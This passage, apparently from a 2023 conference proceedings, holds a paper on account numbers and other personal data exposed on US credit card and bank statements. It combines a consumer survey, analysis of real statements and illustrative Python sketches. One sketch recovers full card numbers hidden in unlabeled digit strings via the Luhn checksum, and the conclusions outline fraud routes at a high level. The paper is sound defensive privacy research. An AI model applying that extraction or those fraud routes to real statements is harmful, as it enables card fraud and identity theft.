10. Wang, C.-F., Wu, A.-T., Huang, S.-C.: An energy conserving reversible and irreversible digital watermarking hybrid scheme for cluster-based wireless sensor networks. J. Internet Technol. 19, 105–114 (2018)
11. Kabir, F., Qureshi, A., Megías, D.: A Study on Privacy-Preserving Data Aggregation Techniques for Secure Smart Metering System (2020)
12. Araghi, T.K.: Digital image watermarking and performance analysis of histogram modification based methods. In: Arai, K., Kapoor, S., Bhatia, R. (eds.) SAI 2018. AISC, vol. 858, pp. 631–637. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-01174-1_49
13. Araghi, T.K., Alarood, A.A., Araghi, S.K.: Analysis and evaluation of template based methods against geometric attacks: a survey. In: Saeed, F., Mohammed, F., Al-Nahari, A. (eds.) IRICT 2020. LNDECT, vol. 72, pp. 807–814. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-70713-2_73
14. Li, X., Peng, J., Obaidat, M.S., Wu, F., Khan, M.K., Chen, C.: A secure three-factor user authentication protocol with forward secrecy for wireless medical sensor network systems. IEEE Syst. J. 14, 39–50 (2019)
15. Yi, S., Zhou, Y.: Separable and reversible data hiding in encrypted images using parametric binary tree labeling. IEEE Trans. Multimedia 21, 51–64 (2018)
16. Jagadeesh, S., Parida, A.K., Meenakshi, K., Pradhan, S.: Review on difference expansion based reversible watermarking. In: 2022 3rd International Conference for Emerging Technology (INCET), pp. 1–5 (2022)
17. Guo, H., Li, Y., Jajodia, S.: Chaining watermarks for detecting malicious modifications to streaming data. Inf. Sci. 177, 281–298 (2007)
18. Shi, X., Xiao, D.: A reversible watermarking authentication scheme for wireless sensor networks. Inf. Sci. 240, 173–183 (2013)
19. Liu, X., Ge, Y., Zhu, Y., Wu, D.: A lightweight integrity authentication scheme based on reversible watermark for wireless body area networks. KSII Trans. Internet Inform. Syst. 8, 4643–4660 (2014)
20. Huang, C.: Wireless sensor networks data processing summary based on compressive sensing. Sens. Transduc. 174, 67 (2014)
21. Ding, Q., Wang, B., Sun, X., Wang, J., Shen, J.: A reversible watermarking scheme based on difference expansion for wireless sensor networks. Int. J. Grid Distrib. Comput. 8, 143–154 (2015)
22. Vadlamudi, S., Islam, A., Hossain, S., Ahmed, A.A.A., Asadullah, A.: Watermarking techniques for royalty accounts in content management websites for IoT image association. Acad. Market. Stud. J. 25, 1–9 (2021)
23. Potlapally, N.R., Ravi, S., Raghunathan, A., Jha, N.K.: Analyzing the energy consumption of security protocols. In: Proceedings of the 2003 International Symposium on Low Power Electronics and Design, 2003. ISLPED 2003, pp. 30–35 (2003)
24. Araghi, T.K., Manaf, A.B.T.A.: Evaluation of digital image watermarking techniques. In: Saeed, F., Gazem, N., Patnaik, S., Saed Balaid, A.S., Mohammed, F. (eds.) IRICT 2017. LNDECT, vol. 5, pp. 361–368. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-59427-9_39
Securing Personally Identifiable Information (PII) in Personal Financial Statements
George Hamilton, Medina Williams, and Tahir M. Khan
Purdue University, West Lafayette, IN 47907, USA
{hamil132,will2345,tmkhan}@purdue.edu
Abstract. Communications between financial institutions and their customers contain private, sensitive information that could be leveraged to commit fraud. While financial institutions in the United States are required to distribute periodic financial statements, these statements may disclose additional information that is not required by law. This research addresses gaps in the literature by comparing information required by law, deemed desirable and undesirable by consumers, and observed on existing personal financial statements. Using a survey of consumer preferences and experiences together with an analysis of financial statements, researchers found that some statements contained sensitive information. With over 50% of respondents receiving statements intended for someone else in the past five years, these occurrences and the available information present an opportunity for fraud. This research may be used to deter sophisticated fraudulent activities such as account takeovers and money laundering and as a reference for future policies governing the information required in financial statements.
Keywords: Privacy · Security · PII · Financial statement · Fraud
1 Introduction
Many businesses and organizations treat privacy and security as premium features instead of incorporating these tenets into normal business operations. In the financial services industry, businesses can treat certain postures of privacy and security compliance as equivalent to meeting safe harbor requirements [9]. Safe harbor refers to thresholds that generally satisfy minimum due diligence requirements, or that demonstrate intent to comply, or compliance, with a law or regulation. In addition, many institutions associate these same minimal compliance levels of privacy and security with reasonable assurance. These fallacies in perspective leave the critical functions of such organizations and businesses susceptible to vulnerabilities, reputational and operational risks, fraud, and monetary losses.
Various laws and regulations require banks, credit unions, and other financial services providers to regularly supply information to their customer base [3]. Periodic statements, usually issued on a monthly or quarterly basis, are one such mechanism that financial institutions use to communicate with their client base and maintain accurate records. These “personal” financial statements serve as an official accounting of transactions performed by the client (or on their behalf) and recorded by the financial institution. Furthermore, researchers observed that on some personal financial statements, the required information is packaged with supplemental information and offered as an enhanced service thought to add value for clients. From the client’s perspective, there may be little-to-no distinction between required and supplemental information. Such circumstances raise questions about clients’ preferences and risk tolerances regarding the information they see on statements from their financial institution(s).
This paper examines consumer credit card, banking, and investment account statements (also referred to herein as personal financial statements) and queries survey respondents on their preferred manner of receiving this information from their financial institution(s). In addition, researchers utilized the survey to gauge the prevalence of incorrectly delivered physical and electronic personal financial statements as a proxy for potential fraud. The survey also captured participants’ knowledge of personally identifiable information (PII) to see if these baselines align with government regulations or industry best practices.
This work adds to the literature in several ways. By spotlighting how financial institutions process credit card statements, it shows the reader how easily PII can be found and used for fraudulent purposes. The credit card statements located in Appendices A.1, A.2, and A.3 show both commonality in the fields of information displayed and the pattern of encoding. The authors used a survey to capture perceptions of PII use on these credit card statements for a view of where the market is going. Armed with this new research, financial institutions, governmental agencies, and related organizations can shape their policies and services appropriately to meet the needs of their customers while protecting their most prized personal information.
The following sections include a literature review, discussions of methodology and subsequent study results, and lastly thoughts on future adjacent work. Appendices A.1, A.2, and A.3 show several example credit card statements (critical PII withheld) which are crucial to the motivations of this paper.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 709–728, 2023. https://doi.org/10.1007/978-3-031-28073-3_48
2 Review of Relevant Literature
All businesses want to grow their client base by providing the highest level of service or value of products possible. Financial institutions provide both: financial products and services for transacting. As with all business-to-consumer (B2C) relationships, a major component of business revolves around customer service and regularly keeping the customer (synonymous with client or member) informed of account status. Aside from customer service reasons, financial institutions under United States jurisdiction are required by the Gramm-Leach-Bliley Act (GLBA) to provide their customers with certain types of information on a regular and recurring basis [4]. In addition, the GLBA requires financial institutions to take measures to secure customer information against unauthorized disclosure [4].
Research from Alberchet et al. shows identity theft, a possible outcome of unauthorized disclosure, is extremely costly; specifically, it estimates that each incident of identity theft costs an average of $1,500 and 175 man-hours to resolve [1]. In addition, incidents of identity theft are not covered by the Federal Deposit Insurance Corporation (FDIC), National Credit Union Administration (NCUA), or any similar governing agency, meaning financial institutions may have to pay these costs out of pocket [3]. Financial statements required by GLBA are one way in which financial institutions store and transmit information that could subsequently be leveraged for identity theft. Table 1, from the Consumer Financial Protection Bureau (CFPB), illustrates some of the reporting requirements for open-ended lines of credit, which include credit cards. The table marks each field as required or not required for each credit type.
Table 1. Information required by CFPB on monthly financial statements
Information | Home-equity based | Open-ended credit (not home-equity based)
Previous balance
Transaction types
Balance for computing charges
Amount of finance charge
Credits
Total charges
Periodic rates
Change in terms and penalty rate
Annual percentage rate (APR)
Grace period
Billing error address
Closing date of billing cycle (with account balance)
Repayment disclosures
Due date; Late payment costs
Existing literature shows it is possible for these statements to fall into nefarious hands or become subject to unauthorized disclosure. In 2013, 647 monthly statements were stolen from a third-party service provider used by Standard Chartered Bank [2]. In another incident without malicious intent, the National Australia Bank sent 400 statements to the wrong customers [13]. Figures from the United States Postal Service (USPS) reveal the potential for the theft of physical, personal financial statements (“bank statements”) is very real. The USPS
did not track mail theft directly through 2020. However, the nearest estimates based on complaints, including but not limited to mail theft, revealed 175,000 reports in 2020 [12]. Bank statements often have more information than typical checks, which can be used for unauthorized access to banking services [11]. Unauthorized disclosure of financial statements not only jeopardizes the reputation of the institution from which they are stolen but may also slow the adoption of new services the institution hopes to deploy. This is especially true of digital services, like online banking. A 2020 study showed customers who are victims of identity theft were less likely to engage in online banking [6]. The same study also showed that a perceived lack of security controls was one of the primary reasons customers in emerging markets did not engage in online banking [6]. A second study from 2016 reinforces the conclusion that victims of identity theft are less likely to engage in online bill pay services [7]. In addition to the security concerns, some customers are simply unhappy with what they perceive as excessive information on their financial statements [8]. According to a 2022 survey, 78% of respondents prefer to bank digitally. Most others prefer to bank in person, at the ATM, or by phone, and less than 5% prefer to do their banking by mail [10]. Supplemental information can be presented to all groups besides mail after additional authentication. Methods for additional authentication include verifying something the customer has (such as their debit card, government ID, or phone), something they know (such as personal details or a password), or a physical characteristic (such as facial shape or fingerprint). Therefore, there is little reason to include this information on physical statements sent in the mail. Authors Kahn and Linares-Zegarra examined the perception of payment security and its effects on consumer decisions [7]. 
They defined identity theft as the willful transfer, possession, or usage of any name or number that identifies another with the intent of committing, aiding, or abetting a crime. Their study tested the theory that the public shifts to less efficient forms of payment considering two schools of thought. First, that security matters when consumers adopt a payment technique, and second, security is not as important in terms of payment behavior. It is important to note that the latter only examines perceptions of security and does not include specific incidents. The authors find a positive and statistically significant effect from exposure to certain categories of identity theft on the likely adoption of money orders, credit cards, stored value cards, bank account number payments, and online banking bill payments. Additionally, their study determined a positive and statistically significant effect on cash, money orders, and credit cards. Other specific identity theft incidents were associated with decreased usage of checks and online banking bill payments. Overall, the authors found empirical evidence to conclude that identity theft victims tend to opt for payment methods that are not associated with bank account information [7]. Rohmeyer and Bayuk tackle several thought fallacies prevailing within the financial services industry that have implications on security and privacy practices [9]. There are numerous examples where financial industry executives resort to ignorance claims both publicly and privately (i.e. intra-company only) when
faced with security-related challenges. They cite the case of the CEO of Heartland Payment Systems, who, after a major breach, mounted a public relations campaign to deflect blame for the company’s missteps. Often, industry professionals mistake their adherence to standards and regulations as a safe harbor for meeting best practices and sufficient levels of due diligence. However, this is not the case, with several institutional and psychological factors at play. First, there is no agreed-upon definition of [cyber] security within the risk management community. Further, companies, executives, and individuals fail to acknowledge the actual risk levels of such events; many believe the chance of an incident hovers at or near zero percent. Yet prudent risk management practices never assume a zero percent probability of occurrence. Individuals are also beholden to flaws in their own assumptions that personal decisions perfectly predict probable outcomes. One remedy offered is the reduction of vulnerabilities [9].
Reducing the amount of information presented on financial statements to only what is desired by customers and required by regulations, like GLBA, is one major way in which financial institutions can mitigate the effects of unauthorized disclosures of such personal financial statements. However, there is no set of guidelines that addresses the minimum information present on financial statements to satisfy customers, adhere to the GLBA, and minimize the risk of identity theft should statements become part of an unauthorized disclosure. This research addresses a gap in the literature by examining these personal financial statements, surveying customers, and reviewing policy to determine which pieces of information are currently included in financial statements, desired by customers, required by GLBA, or neither required nor desired but a source of additional identity theft risk.
Financial institutions may leverage the results of this research to remove information from their statements that is neither desired by customers nor required by GLBA. This will result in financial statements which do not unnecessarily reveal personal information about customers and reduce the potential attack surface for malicious actors. This may also help financial institutions reduce the resistance of customers in emerging markets to new electronic services, like online banking, driven by a perceived lack of safeguards or other hesitation.
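The comparison described above (information observed on statements versus information required by regulation or desired by customers) can be expressed as simple set operations. The following is a minimal sketch, not the authors' procedure: the function name `classify_fields` is hypothetical, and the membership of each example set is an illustrative assumption rather than a statement of what GLBA or the CFPB actually requires.

```python
# Illustrative sketch only. The set contents are assumptions chosen for the
# example; they are not legal requirements or survey findings.

def classify_fields(observed, required, desired):
    """Split statement fields into three groups.

    keep      -- observed fields that are required or desired
    removable -- observed fields that are neither required nor desired
    missing   -- required fields that were not observed on the statement
    """
    keep = observed & (required | desired)
    removable = observed - required - desired
    missing = required - observed
    return keep, removable, missing


# Hypothetical inputs for one statement.
observed = {
    "new balance",
    "minimum payment due",
    "full name",
    "current credit score",
    "credit score history",
    "list of enabled and disabled services",
}
required = {"new balance", "minimum payment due"}  # assumed for illustration
desired = {"full name"}                            # assumed for illustration

keep, removable, missing = classify_fields(observed, required, desired)
```

Under these assumed inputs, the `removable` set is the candidate list an institution would review for removal, which is the reduced attack surface this section argues for.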
3 Methodology
Researchers created a 23-question survey measuring respondents’ demographics as well as their experiences and preferences with regard to information disclosure by financial institutions. Researchers created the survey in Qualtrics and distributed it using convenience sampling, with IRB approval. The study questions were constructed based on a review of credit card statements similar to those found within Appendices A.1, A.2, and A.3. These statements displayed patterns of information with few, if any, details obfuscated. Some details displayed on the credit card statements are mandated by regulation (see Table 1).
The survey questions were used to gauge the boundaries of providing the required information and adequate protection of PII in the event this information falls into the hands of fraudsters.
3.1 Qualifying Questions
To ensure respondents had the experience to respond to the survey effectively, two qualifying questions were asked before respondents were shown the rest of the questions. The first qualifying question determined if the respondent was eighteen (18) years of age or older, to eliminate participation of minors. The second qualifying question asked if the respondent currently possessed an account with a financial institution in the United States. Researchers note the survey was distributed using convenience sampling, and many respondents were current students. While it is unlikely that an adult US citizen would not have an account with any US financial institution, the survey likely included international students who may have accounts with non-US institutions as well as US students who recently turned 18 and may still rely on the accounts of their parents. If the respondent answered “no” to either of the qualifying questions, they were immediately taken to the end of the survey and were not allowed to answer the remaining questions. The exact wording of the qualifying questions as well as the full set of questions and possible responses can be found in Appendix A.4.
3.2 Survey Contents
To identify relationships between demographic traits and responses to other questions about preferences and experiences, researchers included demographic questions to measure the following attributes of the survey respondents:
– Gender
– Ethnicity
– Age
– Education Level
This research included questions about the preferences of survey respondents. The following areas were covered by the preference questions:
– Preferences between electronic and physical statements.
– Opinions regarding which pieces of information should and should not be included in statements.
– Influence of information disclosure on the choice of financial institutions.
– Preferred means of identifying the respondent’s account on a financial statement.
Lastly, researchers included questions to measure the past experience of survey respondents. These questions covered the following areas:
– Number of financial statements received which were intended for someone else.
– Pieces of information observed on financial statements.
In addition to the questions which were included in the survey shown in Appendix A.4, several questions were considered for inclusion but eventually discarded. One such question involved the income of respondents. While this question might have provided valuable context to respondents’ other answers, researchers decided the sensitive nature of the question might discourage respondents from completing the survey despite the fact that responses were anonymized.
3.3 Sampling
Researchers distributed the Qualtrics survey using convenience sampling. According to the Encyclopedia of Social Measurement: “Convenience sampling involves using respondents who are convenient to the researcher” [5]. Specifically, the survey was distributed using word of mouth, linkedin.com, facebook.com, surveyswap.io, and university email lists. While convenience sampling in the university environment did cause the survey respondents to skew younger, it also allowed researchers to collect the maximum number of responses.
4 Results
4.1 Preferences: Financial Institution
A majority of survey respondents, approximately 54.3%, indicated that they preferred financial institutions which only provided what respondents deemed essential information. The remaining 45.7% consisted of 43.3% of all respondents who indicated they had no preference and only 2.4% who answered that they preferred an institution that provides all possible information on financial statements. Respondents in the 36–40 age group largely indicated they did not have a preference, at a rate of 68.8%. Since this age group is composed of older millennials, their seemingly ambivalent preferences may reflect generational attitudes towards convenience with some skepticism.
4.2 Preferences: Information on Statements
Respondents were asked about their preferred method of identifying their account on their personal financial statements. Researchers asked three targeted questions about three options: use of either the full credit card or account number, the last four digits of their credit card or account number, or a four-digit billing identification number. The last option presents a number unrelated to the account number that acts to obfuscate any sensitive account information from plain view while still uniquely identifying the account. 11.2% preferred to see their full credit card number displayed, while approximately 78.9% preferred seeing only the last four digits of their account number identified. Lastly, 64.8% answered they preferred an
institution to use a four-digit billing ID. These results indicate respondents overwhelmingly prefer an identification method that reduces or completely eliminates information potentially valuable for fraud. Presenting only the last four digits is a step toward more privacy for the individual account holder, but it still provides some valuable information to an attacker should the statement be compromised. A four-digit billing ID is the most secure method of protecting this PII from a consumer’s perspective, assuming the financial institution takes reasonable measures to safeguard this information. However, respondents preferred using the last four digits of their credit card or account number. This may have been for easier identification of accounts or because they did not understand the details of the four-digit billing ID, but follow-up questions would be required to be certain.
Participants in the survey also identified certain elements of information that should not be included in statements. One question asked respondents to identify information elements that should never appear on their credit card statements. Possible options included names (surnames, first, and middle), credit score information, related services, and payment and account history. Respondents could select multiple responses. The top three overall items for exclusion were: credit score history (68.8%), current credit score (58.5%), and list of enabled and disabled services (55.5%). These results were consistent among younger survey participants aged 18–25. Additionally, participants in this age group noted “city and state in which the account was opened” and “year in which the account was opened” as factors eligible to be left off statements, at rates of 50.0% and 41.8%, respectively. Older millennials indicated the year information as superfluous as well.
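The account-identification options discussed in this section can be contrasted in a few lines of code. This is a hedged sketch rather than any institution's actual practice: the function names `mask_to_last_four` and `new_billing_id` are hypothetical, and the sketch assumes a billing ID only needs to be unique among one customer's own accounts, since four digits allow at most 10,000 distinct values.

```python
import secrets


def mask_to_last_four(account_number: str) -> str:
    """Hide every digit except the last four (the 'last four digits' option)."""
    digits = [c for c in account_number if c.isdigit()]
    if len(digits) <= 4:
        raise ValueError("account number too short to mask")
    return "*" * (len(digits) - 4) + "".join(digits[-4:])


def new_billing_id(existing: set) -> str:
    """Draw a random four-digit ID that is unrelated to the account number.

    `existing` holds IDs already assigned (assumed scope: one customer's
    accounts), so the returned ID is unique within that scope.
    """
    if len(existing) >= 10_000:
        raise ValueError("no four-digit IDs left")
    while True:
        candidate = f"{secrets.randbelow(10_000):04d}"
        if candidate not in existing:
            return candidate


# Usage with a well-known test card number, not a real account.
masked = mask_to_last_four("4111 1111 1111 1111")
billing_id = new_billing_id({"0001"})
```

The masked form still leaks four real digits, whereas the billing ID carries no account digits at all; the trade-off is that the institution must store and protect the mapping from billing ID to account.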
From a different perspective, participants seemed to understand the importance of noting a cardholder’s name on statements. “First name” and “last name” were selected least as non-essential information.
4.3 Changing View of PII
The results could indicate that the public view of personally identifiable information (PII) is changing. For example, consumers may accept full legal names as a necessary level of detail on statements but be more sensitive about features such as the city, state, and year of account opening. Additionally, credit scores and score histories are provided by financial institutions under the guise of added or bonus features for consumers. However, this tactic may be perceived by consumers as divulging unnecessary information and could present additional privacy as well as security risks. Financial institutions should not only adjust their product and service offerings to meet the needs of their clients and customers but also continue to educate them on “the why”. The different “whys” tend to include aspects such as regulatory requirements and proactive security measures [9]. While at first glance some financial institutions appear to truncate some of the personal information
related to an individual’s credit card account, it becomes very clear that these details are often embedded in a string of numbers that appears to be intended for reading by an automated system. An example of this encoded information taken from an actual credit card statement, with information modified for privacy, is shown in Fig. 1. This amounts to security through obscurity and is widely considered a flawed practice. As a part of their background research, researchers examined nine personal financial statements from six different institutions. Researchers found that of these nine statements, four contained the full account or credit card number labeled outright on the statement. However, an additional two statements included the full account or credit card number embedded in one of these unlabeled numbers which appeared to come from an automated system. In general, customers may not be aware their full credit card number or account number is present on their statement, as statements examined from Bank of America, PNC, Regions, and Wells Fargo all contained the credit card or account number embedded in the previously mentioned, unlabeled set of numbers.
4.4 Discussion - Information on Statements
The example obfuscated credit statements found in Appendices A.1, A.2, and A.3 show what information is presented to customers in their financial statements. This includes various examples of PII: name, mailing address, etc. Other information pertaining to this open-ended revolving line of credit is included as well: account number, credit limit, available credit, statement due date, minimum payment required, and payment due date. In addition to all of the information described in the example statements, researchers also found additional information in the statements they examined, including the year in which the account was opened, current credit score, credit score history, and routing number. While not every statement provides the same information, much of it is potentially valuable for constructing pretexts and target profiles in social engineering campaigns as well as being directly useful for fraudulent transactions. Appendix A.1 shows an example PNC statement. Customer-related information can be derived from specific areas with very little effort. Fields labeled with the same letter contain the same information, and each occurrence is identified by a unique number. The PNC statement contains: (A) Last 4 Digits of Credit Card Number, (B) Minimum Payment Due, (C) New Balance, (D) Payments Received, (E) Full Credit Card Number, (F) Full Name, and (G) Full Address. The information, while some of it is not clearly labeled by the issuing bank, can be aggregated to gain additional details on the customer. In the case of this statement, information within the payment perforation section is also found within the full statement. Varying levels of information are present within the other statement examples present in Appendices A.2 and A.3. The fictitious Discover Statement in Appendix A.2 has no bar codes and therefore no connection to the series of numbers. Thus a potential adversary cannot figure out the full credit card number. 
However, some information is still present, including the new balance, etc. Citibank’s example statement in Appendix A.3 only displays the last four digits of the credit card number, and the full credit card number cannot be inferred.
Complying with regulatory requirements also brings challenges in protecting this information. Statements sent via postal mail can be compromised in various ways, for example by an affiliated trusted insider accessing a consumer’s information or by a statement being lost in the mail. It is difficult to completely guarantee the confidentiality, security, and privacy of the consumer’s information. Even though electronic means are thought to be more secure, there are challenges from both the financial institution’s perspective and the consumer’s. These survey results reinforce the potential for unauthorized access to personal financial statements [12]. Results showed 63% of respondents had received at least one personal financial statement intended for someone else through the mail in the past five years, with 8.9% of respondents receiving 10 or more.
Fig. 1. Unlabeled numbers showing: (A) New balance, (B) Minimum payment, and (C) Full credit card number
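The embedded account numbers described in Sect. 4.3 illustrate why an unlabeled digit string offers little protection: a reader with the statement in hand can test every window of the string against the standard Luhn checksum used by payment card numbers. The sketch below is an assumption-laden illustration, not the procedure the researchers used; the function names and the 16-digit default length are hypothetical choices, and the sample line uses a widely published test card number rather than real data.

```python
def luhn_valid(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_embedded_card_numbers(line: str, length: int = 16) -> list:
    """List every `length`-digit window of `line` that passes the Luhn check.

    Non-digit characters are dropped first, so windows may span what were
    separate fields on the statement.
    """
    digits = "".join(c for c in line if c.isdigit())
    hits = []
    for start in range(len(digits) - length + 1):
        window = digits[start:start + length]
        if luhn_valid(window):
            hits.append(window)
    return hits


# Hypothetical unlabeled line: padding, a test card number, more padding.
candidates = find_embedded_card_numbers("0012345 4111111111111111 000250")
```

Because the checksum has a single check digit, roughly one in ten arbitrary windows will pass by chance, so the result is a short candidate list rather than a confirmed number. An attacker can narrow it further using the last four digits or the balance fields printed elsewhere on the same statement.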
5 Conclusions
This paper presented a critical analysis of the information found in personal financial statements and its potential for use in fraud. Researchers also conducted a survey to capture consumer preferences, experiences, and understanding of PII. This survey revealed several pieces of information commonly found on personal financial statements that customers prefer to be omitted, including credit score, credit score history, and a list of enabled and disabled services. In addition, the majority of respondents held a preference for financial institutions which only included the minimum necessary information on their financial statements, suggesting a focus on consumer privacy may be beneficial for financial institutions as well as customers. In addition to revealing consumer preferences, survey results also highlighted the potential for unauthorized access to financial statements, with over half of all respondents reporting they received at least one personal financial statement intended for someone else in the past five years. Lastly, researchers found respondents held inconsistent definitions of PII, suggesting further education of consumers may be beneficial.
This study points to other potential vulnerabilities worth further consideration. First, when non-essential information is disclosed by a financial institution, nefarious actors can potentially use it to access accounts through other means. One method is to create fraudulent credit cards in the name of the victim using information derived from or taken directly from the credit card statement. Another method is to initiate a fraudulent transfer to a separate account using just a few details found within most statements, with the internet as a source of supporting information. Second, third-party vendors and insiders in positions of trust have access to privileged information. As such, these organizations must constantly be on guard for unauthorized disclosure via third-party partners. Encoding is another tactic to mitigate unauthorized use of the customer’s account or information. With encoding, information that most people could easily read becomes data that only a machine or computer can read. This creates an additional security barrier, not to mention an extra layer of due diligence. Based on this sampling of personal financial statements, researchers make the following recommendations. First, personal financial statements can convey this information using a uniform template that could utilize bar codes or QR codes instead of a series of numbers. Second, some of the information displayed on the statements is possibly included as a convenience to the institutions. Given the relative ease with which potential hackers can harvest customer PII and connect details together, financial institutions should reevaluate these practices and consider other techniques that protect customer information and details while allowing for operational efficiency.
6 Discussions on Future Work
Future research should seek to strengthen or challenge the conclusions with a similar study conducted over a larger sample size. Additionally, researchers should seek to include a more even distribution of participants across demographics to identify additional correlations between demographics and preferences related to the use of personal information in financial documents. Other efforts should also further explore the relationship between consumer behavior and preferences related to privacy and security. Lastly, the information gathered in this study can assist with building a framework for which items should and should not be included in financial statements based on consumer preferences, regulations, and the potential misuse of the information for fraud.
G. Hamilton et al.
A Appendix
A.1 Example Statement: Only Full Account Number Obfuscated
Fig. 2. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (E) Full credit card number, (F) Full name, and (G) Full address
Securing Personally Identifiable Information (PII)
A.2 Example Statement: Last 4 Digits Obfuscated
Fig. 3. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (F) Full name, and (G) Full address
A.3 Example Statement: No Obfuscated Information
Fig. 4. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (F) Full name, and (G) Full address
A.4 Survey Questions
Note: The original survey was presented to respondents using Qualtrics. However, the questions, available responses, and images have been re-created in the same wording and order in this appendix using LaTeX. Questions that allowed participants to select multiple responses are indicated in this appendix with “(multi-select)” at the end of the question. All questions presented in this appendix that do not end in “(multi-select)” only allowed respondents to select a single response. Responses that allowed respondents to type an answer are indicated in this appendix with “(Text Input)”. Neither of these labels was present in the survey distributed to participants. However, the multi-select questions were indicated to participants using the phrase “Select all that apply” at the end of questions, and the available responses were selected using checkboxes, multiple of which could be selected simultaneously. For questions that only allowed a single response from participants, responses were selected using radio buttons, only one of which could be selected at a time. In the survey presented to participants, responses with text inputs were indicated by a text box which respondents could type into when the response was selected. This paragraph was not included in the survey distributed to participants.
1. Are you at least 18 years of age?
– Yes
– No
2. Do you possess a credit card or bank account in the United States?
– Yes
– No
3. Would you prefer your account be identified in your credit card or bank statement by the full credit card or bank account number (XXXX-XXXX-XXXX-XXXX)? See the image below for an example of a full account number.
– Yes
– No
4. Would you prefer your account be identified in your credit card or bank statement by the last 4 digits of your credit card or bank account number (XXXX)? See the image below for an example of the last 4 digits of a credit card or bank account number.
– Yes
– No
5. Would you prefer your account be identified in your credit card or bank statement by a billing ID that is between 4 and 16 digits unrelated to credit card or bank account number (ZZZZ). See the image below for an example of a 4-digit billing ID. This number can not be used to make purchases, withdrawals, or other transactions with your account. This number is a new identifier proposed by researchers, which is not yet in use.
– Yes
– No
6. Which of the following pieces of information have you seen on any of your credit card or bank statements before? Select all that apply. (Multi-Select)
– Full address
– Phone number
– Full credit card or bank account number (XXXX-XXXX-XXXX-XXXX)
– Last 4 digits of credit card or bank account number (XXXX)
– Credit card expiration date
– Bank account/credit card account rewards ID
– Email address
– Other (Text Input)
– None of the above
7. In your opinion, which pieces of information should never appear on your statement? Select all that apply. (Multi-Select)
– First name
– Middle name
– Last name
– Year in which the account was opened
– Current credit score
– Credit score history
– List of enabled and disabled services. Including online banking, online bill pay, online statements, mobile banking, direct deposit, auto pay, and overdraft protection. See the screenshot below for an example list of enabled and disabled services.
– Information about payments and transactions made over the past month
– Telephone Number
– Other (Text Input)
8. In your opinion, what information do you consider essential for your statement? Select all that apply. (Multi-Select)
– First name
– Middle name
– Last name
– Full credit card number or bank account number (XXXX-XXXX-XXXX-XXXX)
– Last 4 digits of credit card number or bank account number (XXXX)
– 4 digit billing ID (See first question on this page for description)
– Balance and minimum payment information
– Bank Account/Credit Card Account Rewards ID
– Information about payments and transactions made over the past month
– Year in which the account was opened
– City or state in which the account was opened
– List of enabled and disabled services. Including online banking, online bill pay, online statements, mobile banking, direct deposit, auto pay, and overdraft protection. (See the previous question for description)
– Credit card limit
– Available credit
– Telephone Number
– Other (Text Input)
9. In your opinion, would you prefer to have an account with an institution that provides only information you described as essential in the previous section on its statements?
– Disagree: I strongly prefer the institution which provides all possible information on its statements.
– Neither agree nor disagree: I have no preference between the institutions.
– Agree: I strongly prefer the institution which provides only the information I described as essential in the previous question on its statements.
10. In your opinion, which of the following options can be considered personally identifiable information (PII)? Select all that apply.
– Full name (first, last, and middle name)
– Birth date (MM-DD-YYYY)
– Social security number
– Home address (includes street address and home or apartment number)
– Year account or credit card was opened
– Bank Account/Credit Card Account Rewards ID
– Full credit card number or bank account number (XXXX-XXXX-XXXX-XXXX)
– Last four digits of credit card number or bank account number (XXXX)
– Credit card limit
– Credit score
– Other (Text Input)
11. How many paper statements have you received which were addressed to another person in the past 5 years?
– 10+ statements
– 6–10 statements
– 2–5 statements
– 1 statement
– 0 statements
12. How many electronic statements have you received which were addressed to another person in the past 5 years?
– 10+ statements
– 6–10 statements
– 2–5 statements
– 1 statement
– 0 statements
13. If you have ever received a statement or other document (paper or electronic) addressed to another person, which of the following do you believe you received? Select all that apply. (Multi-Select)
– Medical bill
– Credit card or bank statement
– Mortgage statement
– Utility bill
– Government document (drivers license, selective service paperwork, tax forms, etc.)
– Bank document containing updated PIN
– Other confidential documents (please type) (Text-Input)
– I have not received a statement or document addressed to another person
14. In your opinion, what information about your credit score should appear on your credit card statement?
– No information about your credit score
– Current credit score
– Current credit score and score history
15. In your opinion, should electronic financial statements include the same information as paper statements?
– Electronic statements should contain more information than paper statements
– Electronic statements should contain the same information as paper statements
– Electronic statements should contain less information than paper statements
16. Have you ever provided your credit card or bank statement to another organization outside of your credit card company or bank? For example: mortgage companies, the bureau of motor vehicles, utilities companies, property rental companies, etc.
– Yes
– No
17. In what form do you currently receive your financial statements?
– Exclusively paper
– More than half paper
– Half paper, half electronic
– More than half electronic
– Exclusively electronic
– I do not receive any financial statements
18. When you move to a new address, how do you inform your bank or credit card company?
– I change my address through the post office
– I change my address through my online banking website
– I change my address through both my online banking website and the post office
– I do not inform my bank or credit card company
– Other (Text Input)
19. Regardless of how you inform your bank or credit card company: When you move to a new address, how far in advance do you inform your bank or credit card company?
– Greater than 4 weeks
– Between 1 week and 4 weeks
– Between 1 day and 1 week
– Less than 1 day
– Never
– Other/Unknown (Text Input)
20. Select the highest level of education you’ve completed
– No education
– High school
– Some college
– 2-Year associates or professional degree
– Bachelor’s degree
– Master’s degree
– Ph.D. or higher
– Prefer not to answer
21. Select your gender
– Male
– Female
– Non-binary
– Other (Text Input)
– Prefer not to say
22. Select your ethnicity
– Caucasian
– Black/African-American
– Latino or Hispanic
– Asian
– Middle Eastern
– Native American
– Native Hawaiian or Pacific Islander
– Two or more of the options above
– Other/Unknown (Text Input)
– Prefer not to answer
23. Select your age range
– 18–25
– 26–30
– 31–35
– 36–40
– 41–45
– 46–55
– 55–64
– 65+
– Prefer not to answer
References
1. Albrecht, C., Albrecht, C., Tzafrir, S.: How to protect and minimize consumer risk to identity theft. J. Finan. Crime 18(4), 405–414 (2011)
2. Arnold, M.: Standard chartered says it has acted after bank statements theft. FT.com (2014)
